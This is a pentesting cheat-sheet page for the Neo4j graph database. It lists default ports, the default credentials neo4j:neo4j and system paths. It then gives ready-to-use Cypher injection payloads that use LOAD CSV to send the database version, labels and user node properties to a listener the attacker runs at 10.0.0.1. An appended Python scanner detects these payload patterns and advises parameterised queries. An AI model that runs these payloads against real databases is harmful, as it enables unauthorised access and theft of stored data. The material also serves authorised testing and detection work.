Neo4j Pentesting

Last modified: 2023-04-27


Neo4j is a graph database management system developed by Neo4j. The default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), and 7687 (Bolt).

Default Credentials

neo4j:neo4j

Common Directories & Files in Local System

/var/lib/neo4j
/var/log/neo4j

Cypher Injection

Before injecting payloads, we need to start a local web server to receive the results of the query.

sudo python3 -m http.server 80

The payloads are listed below.

In payloads that contain 10.0.0.1, replace it with your IP address.

<!-- Get Neo4j version -->
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

<!-- Get labels -->
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //

<!-- Get properties of the key -->
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
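
Detection side of the payloads above, as an added example that is not part of the original page: a heuristic scanner for request parameter values or logged query text that flags the shapes these payloads share (quote break with a tautology, metadata procedure calls, LOAD CSV with a concatenated URL, trailing comment). The function names, severity levels and the allowed_hosts parameter are assumptions made for this example, and the sample inputs are constructed.

```python
import re

INDICATORS = {
    # LOAD CSV whose URL literal is extended by string concatenation
    "oob_load_csv": re.compile(r"LOAD\s+CSV\s+FROM\s+'https?://[^']*'\s*\+", re.I),
    # Metadata procedures used for version and label discovery
    "metadata_proc": re.compile(r"CALL\s+(?:dbms\.components|db\.labels)\s*\(", re.I),
    # Property enumeration over a matched node
    "property_dump": re.compile(r"UNWIND\s+keys\s*\(", re.I),
    # Quote break followed by a tautology
    "quote_tautology": re.compile(r"'\s*OR\s+1\s*=\s*1\b", re.I),
    # Comment marker that cuts off the rest of the original query
    "trailing_comment": re.compile(r"//\s*$"),
}
CALLBACK_HOST = re.compile(r"LOAD\s+CSV\s+FROM\s+'https?://([^/'?:]+)", re.I)

def inspect(value):
    """Return (sorted indicator names, LOAD CSV hosts) for one value."""
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(value))
    return hits, CALLBACK_HOST.findall(value)

def triage(values, allowed_hosts=frozenset()):
    """Score each value; concatenated LOAD CSV to an unlisted host is high."""
    findings = []
    for index, value in enumerate(values):
        hits, hosts = inspect(value)
        if not hits:
            continue
        unknown = [h for h in hosts if h not in allowed_hosts]
        if "oob_load_csv" in hits and unknown:
            severity = "high"
        else:
            severity = "medium" if len(hits) >= 2 else "low"
        findings.append({"index": index, "severity": severity,
                         "indicators": hits, "hosts": unknown})
    return findings

# Constructed sample inputs; the third is the label payload from this page.
SAMPLES = [
    "alice",
    "LOAD CSV FROM 'https://files.example.internal/people.csv' AS row RETURN row",
    "' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM "
    "'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //",
]

if __name__ == "__main__":
    for finding in triage(SAMPLES):
        print(finding)
```

Pattern matching like this is a detection aid only. Passing user input as query parameters instead of concatenating it into the Cypher string is what keeps these payloads from being parsed as query text.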